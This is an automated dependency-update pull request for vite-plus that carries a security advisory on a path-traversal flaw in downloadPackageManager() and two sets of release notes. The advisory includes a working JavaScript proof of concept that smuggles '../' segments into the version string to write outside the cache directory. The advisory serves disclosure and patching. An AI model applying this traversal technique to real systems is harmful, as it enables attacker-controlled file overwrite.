chore(deps): update dependency vite-plus to v0.1.17 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vite-plus (source)	0.1.15 → 0.1.17

---

Path traversal in vite-plus/binding downloadPackageManager() writes outside VP_HOME

CVE-2026-41211 / GHSA-33r3-4whc-44c2

More information

Details

Summary

downloadPackageManager() in vite-plus/binding accepts an untrusted version string and uses it directly in filesystem paths. A caller can supply ../ segments to escape the VP_HOME/package_manager/<pm>/ cache root and cause Vite+ to delete, replace, and populate directories outside the intended cache location.

Details

The public vite-plus/binding export downloadPackageManager() forwards options.version directly into the Rust package-manager download flow without validating that it is a normal semver version.

That value is used as a path component when building the install location under VP_HOME. After the package is downloaded and extracted, Vite+:

1. computes the final target directory from the raw version string,
2. removes any pre-existing directory at that target,
3. renames the extracted package into that location, and
4. writes executable shim files there.

Because the CLI validates versions via semver::Version::parse() before calling this code, the protection that exists for normal vp create, vp migrate, and vp env flows does not apply to direct callers of the binding. A programmatic caller of vite-plus/binding can pass traversal strings such as ../../../escaped and break out of VP_HOME.

PoC

import fs from "node:fs";
import http from "node:http";
import os from "node:os";
import path from "node:path";
import { downloadPackageManager } from "vite-plus/binding";

const tgz = Buffer.from(
  "H4sIAH/B1GkC/+3NsQqDMBjE8W/uU4hTXUwU0/dJg0irTYLR9zftUnCWQvH/W+645aJ1ox16dX94FX181e6Z5GA6u3XdJ7N9at223/7em8YYI4WWH1jTYud8L+fkgk9h6uspDNcyjGV1EQAAAAAAAAAAAAAAAADAH9gAb+vJ9QAoAAA=",
  "base64",
);

const vpHome = fs.mkdtempSync(path.join(os.tmpdir(), "vp-home-"));
const version = "../../../vite-plus-escape";
const escapedRoot = path.resolve(vpHome, "package_manager", "pnpm", version);
const escapedInstallDir = path.join(escapedRoot, "pnpm");

process.env.VP_HOME = vpHome;

const server = http.createServer((req, res) => {
  res.writeHead(200, { "content-type": "application/octet-stream" });
  res.end(tgz);
});

await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
const { port } = server.address();
process.env.npm_config_registry = `http://127.0.0.1:${port}`;

const result = await downloadPackageManager({
  name: "pnpm",
  version,
});

server.close();

console.log("VP_HOME =", vpHome);
console.log("installDir =", result.installDir);
console.log("escaped =", escapedInstallDir);
console.log("shim exists =", fs.existsSync(path.join(escapedInstallDir, "bin", "pnpm")));

// installDir is outside VP_HOME, and <escaped>/pnpm/bin/pnpm is created

Impact

A caller that can influence downloadPackageManager() input can escape the Vite+ cache directory and make the process overwrite attacker-chosen directories outside VP_HOME. When combined with the supported custom-registry override (npm_config_registry), this becomes attacker-controlled file write outside the intended install root.

Mitigating factors

• Normal CLI usage is not affected. All built-in CLI paths (vp create, vp migrate, vp env) validate the version string via semver::Version::parse() before it reaches downloadPackageManager().
• The vulnerability is only reachable by programmatic callers that import vite-plus/binding directly and pass an untrusted version string.
• No known downstream consumers pass untrusted input to this function.
• Exploitation requires the attacker to already be executing code in the same Node.js process.

Severity

• CVSS Score: 8.4 / 10 (High)
• Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H

References

• https://github.com/voidzero-dev/vite-plus/security/advisories/GHSA-33r3-4whc-44c2
• https://nvd.nist.gov/vuln/detail/CVE-2026-41211
• https://github.com/advisories/GHSA-33r3-4whc-44c2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

voidzero-dev/vite-plus (vite-plus)

v0.1.17: vite-plus v0.1.17 — Windows installer, Nushell, and safer upgrades

Compare Source

Broader platform reach with a standalone Windows installer and Nushell shell support.

Highlights

• Windows .exe installer — standalone vp-setup.exe now shipped as release asset for fully offline-friendly Windows installs (#​1293)
• Nushell support — new env.nu wrapper makes vp env work natively in Nushell (#​1312)
• Node.js compatibility guard — vp now blocks execution on incompatible Node.js versions instead of failing opaquely (#​1360)
• Safer global install & vp upgrade — hardened trampoline regeneration and overall upgrade path to avoid leaving partial installs behind (#​1338, #​1369)
• Cached vp check — task runner now caches vp check output for faster repeat runs (#​1328)

Features

• Add standalone Windows .exe installer (vp-setup.exe) (#​1293) — @​fengmk2
• Add Nushell support via env.nu wrapper (#​1312) — @​naokihaba
• Set npm.scriptRunner to vp in vp create scaffolds (#​1346) — @​jong-kyung
• Block vp commands when Node.js version is incompatible (#​1360) — @​liangmiQwQ
• Add vp node shorthand for vp env exec node (#​1359) — @​fengmk2
• Upgrade upstream toolchain — vite 8.0.8, vitest 4.1.4, rolldown 1.0.0-rc.15, tsdown 0.21.8, oxlint 1.60.0, oxfmt 0.45.0, oxc 0.124.0 (#​1334, #​1341, #​1352, #​1375) — @​Brooooooklyn

Fixes & Enhancements

• Add vp create e2e tests and fix yarn/bun migration bugs (#​1317) — @​fengmk2
• Resolve bin/oxfmt the same way as oxlint (#​1326) — @​leaysgur
• Enable cache support for vp check in task runner (#​1328) — @​fengmk2
• Consolidate agent instructions (#​1340) — @​cpojer
• Safer Vite+ global install and vp upgrade flow (#​1338) — @​kazupon
• Auto-fix git symlinks when core.symlinks is false (#​1353) — @​T4ko0522
• Add env.VP_VERSION for oxlint and oxfmt (#​946) — @​leaysgur
• Retry pnpm dedupe --check in CI to handle non-deterministic resolution (#​1365) — @​fengmk2
• Filter KeyEventKind on Windows so arrow-key navigation works correctly (#​1362) — @​fengmk2
• Remove unnecessary quotes from vitest-dev override in upgrade script (#​1368) — @​fengmk2
• Regenerate all trampoline .exe files after upgrade (#​1369) — @​fengmk2
• Reject non-semver package manager versions during install (#​1386) — @​fengmk2, reported by @​Jvr2022

Refactor

• Use rolldown's disable_panic_hook feature for panic hook (#​1330) — @​fengmk2
• Clean up footer (#​1342) — @​mdong1909
• Extract check command into its own module (#​1350) — @​fengmk2
• Split cli.rs into focused submodules (#​1351) — @​fengmk2

Docs

• Improve docs for vpx command (#​1303) — @​connorshea
• Fix dev mode docs (#​1343) — @​TheAlexLichter

Chore

• Use vp check instead of vp fmt && vp lint in monorepo template (#​1339) — @​fengmk2
• Renovate: ignore oxc/oxfmt/oxlint/tsgolint updates (#​1372) — @​camc314
• Update crate-ci/typos action to v1.45.1 (#​1376) — @​renovate[bot]

Published Packages

• @voidzero-dev/vite-plus-core@0.1.17
• @voidzero-dev/vite-plus-test@0.1.17
• vite-plus@0.1.17

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Or download and run vp-setup.exe from the assets below.

Upgrade:

vp upgrade

New Contributors

Welcome to all new contributors! 🎉

@​T4ko0522

Full Changelog: voidzero-dev/vite-plus@v0.1.16...v0.1.17

v0.1.16: vite-plus v0.1.16 — Security patches, Volta migration and Windows fixes

Compare Source

A broad release focused on security and ecosystem compatibility: 3 Vite dev server security fixes, Volta migration support, Bun object-form workspaces, JFrog registry support, and a wave of Windows and shell fixes.

Highlights

• Security: 3 Vite dev server vulnerabilities patched — Vite 8.0.5 fixes arbitrary file read via WebSocket (CVE-2026-39363, High — vite#22159), server.fs.deny bypass with query parameters (CVE-2026-39364, High — vite#22160), and path traversal in optimized deps .map handling (CVE-2026-39365, Moderate — vite#22161)
• Volta node version migration — vp migrate now migrates Volta-managed Node.js versions to .node-version (#​1201)
• vp env off disables Node.js management globally — Disables Node.js management for all vp commands, not just the current shell (#​1255)
• Bun object-form workspace support — Workspaces defined as objects in package.json are now properly detected (#​1250)
• Windows install reliability — Fixed PowerShell install errors and scoped CI env vars to child processes (#​1284, #​1292)

Features

• Support volta node version migration to .node-version (#​1201) — @​naokihaba
• Make vp env off disable Node.js management for all vp commands (#​1255) — @​fengmk2
• Add explanations to migration prompts (#​1270) — @​hakshu25
• vp run --cache now supports running without a task specifier and opens the interactive task selector (vite-task#313) — @​HaasStefan

Fixes & Enhancements

• Support JFrog registry metadata JSON format (#​1249) — @​fengmk2
• Support Bun object-form workspaces in package.json (#​1250) — @​fengmk2
• Resolve latest to absolute latest Node.js version (#​1253) — @​fengmk2
• Use bin.js entry point for TypeScript loader in justfile (#​1252) — @​jong-kyung
• Replace deprecated @tanstack/create-start with @tanstack/cli (#​1259) — @​jong-kyung
• Include additional supported config types from lint-staged (#​1263) — @​porada
• Add vitest to devDependencies for peer dep resolution (#​1261) — @​fengmk2
• Do not treat lint warnings as errors in exit code (#​1268) — @​fengmk2
• Resolve tsgolint on Windows with bun package manager (#​1269) — @​fengmk2
• Bypass package manager release age gates during vp upgrade (#​1272) — @​kazupon
• Wrap zsh completion in eval for dash compatibility (#​1280) — @​shaneturner
• Write merged LICENSE directly instead of LICENSE.md (#​1281) — @​fengmk2
• Update .yarnrc template to use node_modules (#​1297) — @​rChaoz
• Scope CI env var to child process in Windows install script (#​1292) — @​fengmk2
• Correctly resolve tsgolint in yarn monorepo packages (#​1310) — @​rChaoz
• Override rolldown panic hook with vite-plus branding (#​1287) — @​fengmk2
• Fix PowerShell install errors on Windows (#​1284) — @​fengmk2

Refactor

• Use .ts import extensions (#​1274) — @​fengmk2
• Migrate CLI build from tsc+rolldown to tsdown (#​1276) — @​fengmk2
  Replaces the split build strategy (tsc for local CLI code + rolldown for global modules) with a unified tsdown configuration. All third-party deps are now inlined at build time, eliminating the rolldown.config.ts and its manual external/path-rewriting plugins. Runtime dependencies dropped from 10 → 6:

  	Before (v0.1.15)	After (v0.1.16)
  dependencies	10	6
  Removed	cac, cross-spawn, jsonc-parser, picocolors	(inlined by tsdown)

Docs

• Document aliased package update steps (#​1266) — @​fengmk2
• Add custom Node.js mirror docs and rename VITE_NODE_DIST_MIRROR to VP_NODE_DIST_MIRROR (#​1254) — @​kazupon
• Add info about bun as pkg manager (#​1294) — @​TheAlexLichter
• Improve docs for core commands (#​1304) — @​connorshea
• Soften troubleshooting claims around vite config loading (#​1313) — @​FleetAdmiralJakob
• Remove redirect (#​1306) — @​connorshea

Chore

• Upgrade upstream dependencies: oxc 0.123.0, rolldown 1.0.0-rc.13, vite 8.0.5, esbuild 0.28.0, TypeScript 6.0.2, sass 1.99.0, oxlint-tsgolint 0.20.0, rolldown-plugin-dts 0.23.2, @​vitejs/devtools 0.1.13, Vue 3.5.31 (#​1267, #​1279, #​1319) — @​Brooooooklyn
• Bump vite-task to 076cef4 (#​1320) — @​fengmk2
• Use matchDepNames for vite-task crates in renovate config (#​1217) — @​fengmk2
• Clarify Node.js version management prompt (#​1273) — @​fengmk2
• Update crate-ci/typos action to v1.45.0 (#​1262)

Published Packages

• @voidzero-dev/vite-plus-core@0.1.16
• @voidzero-dev/vite-plus-test@0.1.16
• vite-plus@0.1.16

Installation

macOS/Linux:

curl -fsSL https://vite.plus | bash

Windows:

irm https://vite.plus/ps1 | iex

Upgrade:

vp upgrade

New Contributors

Welcome to all new contributors! 🎉

@​porada, @​hakshu25, @​shaneturner, @​rChaoz, @​FleetAdmiralJakob

Full Changelog: voidzero-dev/vite-plus@v0.1.15...v0.1.16

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.